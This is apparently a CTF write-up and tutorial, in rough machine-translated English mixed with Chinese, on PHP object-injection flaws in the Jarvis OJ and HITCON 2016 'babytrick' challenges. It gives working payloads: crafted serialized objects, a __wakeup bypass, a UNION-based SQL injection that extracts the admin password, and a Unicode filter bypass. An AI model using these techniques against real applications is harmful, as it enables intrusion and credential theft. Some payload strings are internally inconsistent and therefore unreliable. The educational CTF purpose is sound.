Serialization
Serialization popular point is to say a string that can be transmitted into the object
php serialize () function
A serialized object or array, and returns a string. After serialized object can easily pass it to another where it is needed, and the type and structure will not change.
<?php
$sites = array('Google', 'Microsoft', 'Facebook');
$serialized_data = serialize($sites);
echo $serialized_data . PHP_EOL;
?>
Output:
a:3:{i:0;s:6:"Google";i:1;s:9:"Microsoft";i:2;s:8:"Facebook";}
解释
a: 代表数组(如果是o就代表对象(object))
3: 代表数组里面有3个变量
i: 代表数据类型(i:int;s:string)
6: 代表数据长度
Deserialization
php unserialize () function
For () function after the object or array to deserialize serialized by serialize, and return to the original structure object.
<?php
$str = 'a:3:{i:0;s:6:"Google";i:1;s:9:"Microsoft";i:2;s:8:"Facebook";}';
$unserialized_data = unserialize($str);
print_r($unserialized_data);
?>
Output:
Array ( [0] => Google [1] => Microsoft [2] => Facebook )
Magic Methods
Php syntax, the system comes with some method names all begin with a double underscore, it will be called under certain circumstances. The so-called magic function. Here mainly involves the following:
__construct()...........在每次创建新对象时先调用
__destruct()............某个对象的所有引用都被删除或者当对象被显式销毁时执行
__toString()............用于一个类被当成字符串时应怎样回应
__sleep() ..............在被序列化之前运行
__wakeup()..............反序列化时被调用
Case Analysis
Jarvis secret of the Aegis Board
By php file containing source code vulnerabilities to gain, just to introduce vulnerabilities php deserialized back part
index.php:
<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
$x = unserialize($g);
}
echo $x->readfile();
?>
shield.php
<?php
//flag is in pctf.php
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
}
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
}
}
}
?>
__construct
Function (that is, when instance is created new Shield()
when) to perform, so it will not affect the $file
operation of
<?php
//flag is in pctf.php
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
}
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
}
}
}
$shield=new Shield('pctf.php');
echo serialize($shield);
?>
Output:
O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
payload:
http://web.jarvisoj.com:32768/index.php?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
Hitcon-CTF-2016 baby tricks
https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick
<?php
//include:将 PHP 文件的内容插入另一个 PHP 文件
include "config.php";
class HITCON{
//private:被private修饰的变量和方法,只能在所在的类的内部被调用和修改,不可以在类的外部被访问。在子类中也不可以。
private $method;
private $args;
private $conn;
//定义一个构造方法初始化赋值
public function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
$this->__conn();
}
function show() {
list($username) = func_get_args();
//sprint:把格式化的字符串写入一个变量中
$sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);
$obj = $this->__query($sql);
if ( $obj != false ) {
$this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
} else {
$this->__die("Nobody Nobody But You!");
}
}
function login() {
global $FLAG;
list($username, $password) = func_get_args();
//trim:移除字符串两侧的空白字符或其他预定义字符
//mysql_escape_string:转义特殊字符
$username = strtolower(trim(mysql_escape_string($username)));
$password = strtolower(trim(mysql_escape_string($password)));
$sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);
//stripos:查找字符串第一次出现的位置
if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
$this->__die("Orange is so shy. He do not want to see you.");
}
$obj = $this->__query($sql);
if ( $obj != false && $obj->role == 'admin' ) {
$this->__die("Hi, Orange! Here is your flag: " . $FLAG);
} else {
$this->__die("Admin only!");
}
}
function source() {
//highlight_file:对文件进行语法高亮显示
highlight_file(__FILE__);
}
function __conn() {
global $db_host, $db_name, $db_user, $db_pass, $DEBUG;
if (!$this->conn)
$this->conn = mysql_connect($db_host, $db_user, $db_pass);
mysql_select_db($db_name, $this->conn);
if ($DEBUG) {
$sql = "CREATE TABLE IF NOT EXISTS users (
username VARCHAR(64),
password VARCHAR(64),
role VARCHAR(64)
) CHARACTER SET utf8";
$this->__query($sql, $back=false);
$sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
$this->__query($sql, $back=false);
}
mysql_query("SET names utf8");
mysql_query("SET sql_mode = 'strict_all_tables'");
}
function __query($sql, $back=true) {
$result = @mysql_query($sql);
if ($back) {
return @mysql_fetch_object($result);
}
}
function __die($msg) {
$this->__close();
header("Content-Type: application/json");
die( json_encode( array("msg"=> $msg) ) );
}
function __close() {
mysql_close($this->conn);
}
function __destruct() {
$this->__conn();
if (in_array($this->method, array("show", "login", "source"))) {
@call_user_func_array(array($this, $this->method), $this->args);
} else {
$this->__die("What do you do?");
}
$this->__close();
}
function __wakeup() {
foreach($this->args as $k => $v) {
$this->args[$k] = strtolower(trim(mysql_escape_string($v)));
}
}
}
if(isset($_GET["data"])) {
@unserialize($_GET["data"]);
} else {
new HITCON("source", array());
}
?>
Source Audit:
php deserialized vulnerability, injecting the object, unserialize
the function is not filtered __wakeup
function of the filter, bypassing the __wakeup
functions: skipped __wakeup object attribute value number greater than the number of transactions performed attributes (reference links 4)
First of all incoming parameters data
we need to construct a sequence of injecting users get orange sql database password
show()
function show() {
list($username) = func_get_args();
//sprint:把格式化的字符串写入一个变量中
$sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);
$obj = $this->__query($sql);
if ( $obj != false ) {
$this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
} else {
$this->__die("Nobody Nobody But You!");
}
}
Show the analysis method, constructed as follows:
payload:
<?php
class HITCON{
private $method="show";
private $args=array("yoloyanng' union select password,username,role from users where username = 'orange' -- ");
private $conn=1;
}
$hit = new HITCON();
$result = serialize($hit);
var_dump($result);
?>
sql statement would be:
SELECT * FROM users WHERE username='lll' union select password,username,role from users where username = 'orange' -- '
Question: I do not know why the username
value is limited, enter some other characters are not able to get results
get:
O:6:"HITCON":2:{s:14:"HITCONmethod";s:4:"show";s:12:"HITCONargs";a:1:{i:0;s:87:"lll' union select password,username,role from users where username = 'orange' -- ";}}s:12:"HITCONconn";i:1;}
Constructed as follows:
O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:79:"lll' union select password,username,role from users where username='orange' -- ";}}s:12:"%00HITCON%00conn";i:1;}
说明:至于为什么加上%00
:当字符串为private类型时,序列化时生成的序列化字符串中类名前后会有0×00
得到:{"msg":"root is admin"}
login()
function login() {
global $FLAG;
list($username, $password) = func_get_args();
$username = strtolower(trim(mysql_escape_string($username)));
$password = strtolower(trim(mysql_escape_string($password)));
$sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);
if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
$this->__die("Orange is so shy. He do not want to see you.");
}
$obj = $this->__query($sql);
if ( $obj != false && $obj->role == 'admin' ) {
$this->__die("Hi, Orange! Here is your flag: " . $FLAG);
} else {
$this->__die("Admin only!");
}
}
if ( $username == 'orange' || stripos($sql, 'orange') != false )
可以看到对于用户名进行了过滤,可以参考连接3的绕过方法
payload:
<?php
class HITCON{
private $method;
private $args;
public function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
}
$args['username'] = 'orÃnge';
$args['password'] = 'root';
$data = new HITCON('login',$args);
var_dump(serialize($data));
?>
得到:
O:6:"HITCON":2:{s:14:"HITCONmethod";s:5:"login";s:12:"HITCONargs";a:2:{s:8:"username";s:7:"orÃnge";s:8:"password";s:4:"root";}}
构造:
O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{s:8:"username";s:7:"orÃnge";s:8:"password";s:4:"root";}}
{"msg":"Hi, Orange! Here is your flag: HITCON{php 4nd mysq1 are s0 mag1c, isn't it?}"}
参考
(1)https://www.freebuf.com/articles/web/167721.html
(2)https://blog.csdn.net/qq_40996739/article/details/82724602
(3)https://blog.spoock.com/2016/11/08/hitcon-babytrick-writeup/
(4)https://www.freebuf.com/vuls/116705.html